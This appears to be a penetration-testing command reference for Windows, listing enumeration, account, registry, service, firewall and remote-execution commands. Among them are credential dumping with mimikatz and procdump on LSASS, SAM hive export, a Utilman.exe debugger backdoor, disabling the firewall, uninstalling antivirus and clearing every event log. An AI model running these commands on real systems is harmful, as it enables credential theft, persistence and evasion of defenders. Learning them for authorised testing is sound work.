In a Windows operating system seized during penetration tests, some operations need to be done via the command line. We will examine the basic commands that can be run on the Windows operating system in penetration tests.
User and Group Operations
We will explain the user and group operations step by step below.
User Actions on the Local Computer
You can use the following commands for user actions on the local computer.
- whoami
- echo %username%
- echo %computername%%username%
- whoami /priv
- net user omer /Active:Yes
- net user omer 123qqqQ
- net user omer /del
- whoami /all
- net user
- net user omer
- net user omer 123qqqQ /add
Group Operations on the Local Computer
You can use the following commands for group operations on the local computer.
- net localgroup
- net localgroup “Remote Desktop Users”
- net localgroup Administrators omer /add
- net localgroup “Backup Operators” omer /del
- net localgroup “System Administrators” /add
- net localgroup “System Administrators” /del
User Actions in the Domain
You can use the following commands for user actions in the domain.
- net user /domain
- net user omer.sivka /domain
- net user omer.sivka /Active: Yes /domain
- net user omer.sivka 123qqqQ /domain
- net user omer.sivka /del /domain
- net user ismail.sivka 123qqqQ /add /domain
- wmic useraccount where name = ‘omer’ list full /format: list
Critical group (AdminSDHolder) Operations in the Domain
You can use the following commands for critical group (AdminSDHolder) operations in the domain.
- Get-ADUser -LDAPFilter “(objectcategory=person)(samaccountname=*)(admincount=1)”
- Get-ADGroup -LDAPFilter “(objectcategory=group) (admincount=1)”
- ([adsisearcher]”(AdminCount=1)”).findall()
Group Operations in the Domain
You can use the following commands for group actions in the domain.
- net group /domain
- dsquery group -limit 0 | dsget group -members –expand
- net group “Help Desk” /add /domain
- net group “Help Desk” /del /domain
- wmic group get Description, Domain, Name, SIDType
- net group “Domain Computers” /domain
- net group “Domain Admins” omer.sivka /add /domain
- net group “Domain Users” asaf.sivka /del /domain
- for /f “delims=” %X in (DomainAdminsGroup Members_List.txt) do net user %X /domain >> DomainAdminsGroupMembersCountry Information.txt
Computer Operations
We will explain the computer operations step by step below.
Current System Information
You can use the following commands for current system information.
- systeminfo
- Get-ChildItem Env: | ft Key,Value
- net view
- net config WORKSTATION
- getmac
- systeminfo | findstr “Domain:”
- fsutil fsinfo drives
- wmic computersystem get AdminPasswordStatus, AutomaticResetBootOption, DomainRole, Domain, Model, PartOfDomain, Roles, SystemType, UserName
Account Policy Actions
You can use the following commands for account policy actions.
- net accounts
- net accounts /MAXPWAGE:3
Audit Policy Actions
You can use the following commands for audit policy actions.
- auditpol /get /category:*
- auditpol /set /subcategory:”IPsec Driver” /success:enable /failure:disable
Start Directories
You can use the following commands for startup directories.
- Windows 6.0 ve 6.1
- For all users: %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
- For specific users: %SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
- Windows NT 5.0, 5.1 ve 5.2
- %SystemDrive%\Documents and Settings\ All Users\ Start Menu\Programs\Startup
Sharing Operations
You can use the following commands for sharing operations.
- net share
- net share NewSharing = C:Userstrial /GRANT:Everyone,Full
Process Operations
You can use the following commands for process operations.
- tasklist /v
- tasklist /SVC | findstr /I “explorer.exe”
- Get-Process | where {$_.ProcessName -notlike “svchost*”} | FT Path,Company,Description,ProcessName,SessionId,MainWindowTitle
- tasklist /fi “pid eq 460”
- wmic process get Description, ExecutablePath, ParentProcessId, ProcessID, CommandLine
- qprocess explorer.exe
- qprocess omer.sivka
- taskkill /F /T /IM filezillaftp.exe
- taskkill /PID 1862 /F
- wmic process call create calc
- wmic process where name=”calc.exe” call terminate
Record Value Operations
You can use the following commands for Record Value Operations.
- reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail
- reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 12345 /f
- reg save HKLM\SAM C:\SAMFile
- reg query “HKCU\Software\SimonTatham\PuTTY\Sessions\Registered SessionNamePutty” /v Hostname
- reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f
- reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v Debugger /t REG_SZ /d “C:\Windows\System32\cmd.exe” /f
- reg export “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” result.reg
- reg import result.reg
Session Information
You can use the following commands for session information.
- query session
- qwinsta
- psloggedon -l Omer
- wmic netlogin get BadPasswordCount, FullName, LastLogon, Name, NumberOfLogons, PasswordAge, PasswordExpires, Privileges, UserType
- reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>nul | findstr Default
- Get-ItemProperty -Path ‘Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon’ | select “Default*”
- cmdkey /list
SAM and SYSTEM files
You can use the following commands for SAM and SYSTEM files.
- %SYSTEMROOT%\System32\config\RegBack\SAM
- %SYSTEMROOT%\System32\config\SAM
- %SYSTEMROOT%\repair\system
- %SYSTEMROOT%\System32\config\SYSTEM
- %SYSTEMROOT%\System32\config\RegBack\system
Routing Operations
You can use the following commands for forwarding operations.
- netstat -r
- route print -4
- route add MASK
- route del
Wireless Networking
You can use the following commands for wireless network operations.
- netsh wlan show profiles
- netsh wlan show profile name=ModemSSID
- netsh wlan show profile name=ModemSSID key=clear | findstr “Key Content”
- FileDirectory: C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\XXX
Network Operations
You can use the following commands for network operations.
- ipconfig /all
- arp -a
- nslookup
- tftp -I GET Application.exe
- netsh interface ipv4 set address name=”Local Area Connection” source=static address= mask= gateway=
- netsh interface ipv4 add dnsservers “Local Area Connection”
- netsh interface portproxy add v4tov4 listenport=3000 listenaddress= connectport=4000 connectaddress=
- type C:\Windows\System32\Drivers\etc\hosts
- wmic nic get AdapterType, Description, DeviceId, MACAddress, Name, ServiceName
Network Movements
You can use the following commands for network transactions.
- netstat -ano
- netstat -ano -p TCP | findstr 3389 | findstr /v
- netstat -abf
DNS Information
You can use the following commands for DNS information.
- ipconfig /displaydns
- ipconfig /flushdns
Disc Information
You can use the following commands for disk information.
- wmic logicaldisk get Caption,FreeSpace,Size,VolumeName
- Get-PSDrive | Where {$_.Provider -like “Microsoft.PowerShell.Core\FileSystem”} | FT Root,Description,Used,Free
File and folder operations
You can use the following commands for file and folder operations.
- wmic LOGICALDISK get Caption, DeviceID, FileSystem, Name
- dir /a C:\Users\omer\Downloads\*.pdf
- tree /f /a
- dir /s /b | findstr xlsx
- dir /b /ad “C:\Users\”
- forfiles /P d: /D -30 /S /M *.exe /C “cmd /c echo @path @ext @fname @fdate”
- reg query HKCU /f password /t REG_SZ /s
- reg query HKLM /f password /t REG_SZ /s
- dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
- Get-ChildItem C:\Users -Force | Select FullName, LastAccessTime
- findstr /si “parola sifre password root admin”
- icalcs C:\Users\omer\Desktop\Criticalfile –> icalcs: Sysinternals tool
Service configuration files
You can use the following commands for service configuration files.
- dir /a C:\inetpub\
- dir /s web.config
- dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
- dir /s *pass* == *vnc* == *.config* 2>nul
- findstr /si password *.xml *.ini *.txt *.config 2>nul
File Permissions
You can use the following commands for File Permissions.
- icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “Everyone”
- icacls “C:\Program Files\*” 2>nul | findstr “(M)” | findstr “BUILTIN\Users”
- Get-ChildItem ‘C:\Program Files\*’,’C:\Program Files (x86)\*’ | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match ‘Everyone’} } catch {}}
- accesschk.exe -qwsu “Everyone” *
- accesschk.exe -qwsu “Authenticated Users” *
- accesschk.exe -qwsu “Users” *
Scheduled Tasks
You can use the following commands for scheduled tasks.
- schtasks /query /fo LIST /v | findstr “Folder: HostName: Author: Run: TaskName: Comment:”
- schtasks /Create /SC Daily /TN DailyUserList /TR “C:\Windows\System32\net.exe user”
- at /interactive 15:00 cmd.exe
- net time
- Get-ScheduledTask | where {$_.TaskPath -notlike “\Microsoft*”} | ft TaskName,TaskPath,State
Service Operations
You can use the following commands for service operations.
- sc query state= all
- Get-Service
- sc queryex (Includes PID value)
- sc qc TermService
- netsh firewall set logging droppedpackets = enable
- netsh firewall set logging connections = enable
- The directory where the logs are saved: %systemroot%System32LogFilesFirewallpfirewall.log
- accesschk -cqwvu TrustedInstaller –> accesschk: Sysinternals tool
- wmic service get name, displayname, started, state, AcceptPause, AcceptStop | findstr /C:Term
- wmic service get name,displayname,pathname,startmode 2>nul |findstr /i “Auto” 2>nul |findstr /i /v “C:\Windows\\” 2>nul |findstr /i /v “”” > UnquotedServices
- net stop PolicyAgent
- net start termservice start= auto
- sc config PlugPlay start= disabled
- reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s > SNMPServiceSetting
- sc create ServisAdi binpath=C:\Users\ApplicationFile.exe start= auto
Note: If services that cannot be turned off such as Power, PlugPlay are disabled and the machine is restarted, this service will not work.
Firewall Operations
You can use the following commands for firewall operations.
- netsh firewall set service remotedesktop enable
- netsh firewall show opmode
- netsh firewall add portopening TCP 1234 “Open the Port of 1234” Enable All
- netsh firewall show portopening
- netsh firewall set logging droppedpackets = enable
- netsh firewall set logging connections = enable
- The directory where the logs are saved: %systemroot%System32LogFilesFirewallpfirewall.log
- netsh advfirewall show allprofiles
- netsh advfirewall set allprofiles state off
- netsh advfirewall set currentprofile state off
Programs and Features
You can use the following commands for programs and features.
- dir /a “C:\Program Files”
- dir /a “C:\Program Files (x86)”
- wmic product where name=”Kaspersky Internet Security” call uninstall /nointeractive
- Dism.exe /online /Get-Features /Format:Table
- Dism.exe /online /Enable-Feature /Featurename:TFTP
- pkgmgr /iu:”TelnetClient”
- Get-ChildItem ‘C:\Program Files’, ‘C:\Program Files (x86)’ | ft Parent,Name,LastWriteTime
- Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
- wmic product get name
Starter Programs
You can use the following commands for startup programs.
- wmic startup get name, user, location
- reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- dir “C:\Documents and Settings\%username%\Start Menu\Programs\Startup”
- Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
- Get-ItemProperty -Path ‘Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run’
- Get-ChildItem “C:\Users\All Users\Start Menu\Programs\Startup”
- reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
- reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
- dir “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”
Update – Patch Operations
You can use the following commands for Update-Patch operations.
- wusa /uninstall /kb:2744842 /quiet /norestart
- wmic qfe where HotFixID=”KB3011780″ get Caption, HotFixID
- Get-WmiObject -Class “win32_quickfixengineering” | Select-Object -Property “Description”, “HotfixID”, @{Name=”InstalledOn”; Expression={([DateTime]($_.InstalledOn)).ToLocalTime()}}
- wmic qfe list full /format:htable > Result.html
- dism /online /get-packages
Locking Session
You can use the following commands to lock the session.
- rundll32.exe user32.dll, LockWorkStation
Copy Files
You can use the following commands to copy files.
- copy D:\netcat.exe C:\Users
Getting passwords from RAM
You can use the following commands to obtain passwords from RAM.
- mimikatz > privilege::debug > sekurlsa::logonPasswords
- mimikatz “sekurlsa::logonPasswords full” exit
- procdump -accepteula -ma lsass.exe lsass.dmp
- mimikatz > sekurlsa::minidump lsass.dmp > sekurlsa::logonPasswords
- wce -w
- wce -s WORKGROUP:Administrator:<LM>:<NTLM>
Log operations
You can use the following commands for logging.
- wevtutil qe Application /c:10 /rd:true /f:text
- for /F “tokens=*” %G in (‘wevtutil.exe el’) DO (wevtutil.exe cl “%G”)
Run Commands Like any Other User
You can use the commands below to run a command like any other user.
- runas /env /user:COMPANY\Omer.Sivka cmd
- psexec -s cmd.exe
Group Policy Actions
You can use the following commands for group policy actions.
- gpupdate /force
- gpresult /z
- gpresult /H Policy.html
- gpresult /USER omer.sivka /SCOPE COMPUTER /Z
E-mail Transactions
You can use the following commands for e-mail transactions.
- dsquery user -name “user name”|dsget user -samid -email -display
- Get-Mailbox | fl name, emailaddresses
- Get-QADUser -SizeLimit 0 -Enabled -Email * | Select-Object DisplayName,Email
Domain Trust Relationships
You can use the following commands for domain trust relationships.
- nltest /domain_trusts –> Lists all trust relationships
- nltest /trusted_domains–> Lists all trust relationships
- nltest /dcname:Company –> Returns the server with the PDC role in a given domain.
- nltest /dclist:Company –> Fetches servers with DC role in a given domain.
- nltest /server:DC /trusted_domains
- ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Domains –> All domains in the forest are listed.
- netdom query /domain Company.local TRUST –> Lists all trust relationships. Different data can also be listed with FSMO, DC, PDC, OU, WORKSTATION instead of TRUST.
Information of the Logged in Domain Account
You can use the following commands for the logged on domain account information.
- Get-EventLog security 4624 -newest 10000 | Where-Object{$_.Message -like ‘*Omer.Sivka*’}| format-list Message > LoginInformationOmerSivkaAccount.txt
Note: The specified command must be run on the domain controller (DC).
Remote Computer Operations
Below we will describe remote computer operations step by step.
System information for the remote computer
You can use the following commands to get system information for the remote computer.
- psinfo \\ -h -s -d
- systeminfo /S /U Sample\Omer /P 123qqqQ
Access to the Remote Computer’s Command line
You can use the following commands to access the remote computer’s command line.
- psexec \\ -u COMPANYomer.sivka -p 123qqqQ cmd.exe /accepteula
- psexec \\ -u COMPANYomer.sivka -p 123qqqQ -c -f \\\Sharing\Application.exe
Processes running on the remote computer
You can use the following commands for processes running on the remote computer.
- tasklist /V /S /U COMPANYomer.sivka /P Fenerbahce
Record values on the remote computer
You can use the following commands for registry values on the remote computer.
- reg query “\\\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Userinit
Access to the share of the remote computer
You can use the following commands to access the share of the remote computer.
- net use K: \\\C$ /USER:COMPANY\omer.sivka 123qqqQ
- net use K: /delete
Sessions open on the remote computer
You can use the following commands for sessions open on the remote computer.
- query session /server:DCserver
- reset session 3 /server:DCserver
Scheduled tasks on the remote computer
You can use the following commands for scheduled tasks on the remote computer.
- net time \\
- at \\ 11:22 Script.bat
Copying the directory on the remote computer
You can use the following commands to copy the directory on the remote computer.
- xcopy /s\SharingFolder C:\CopyDirectory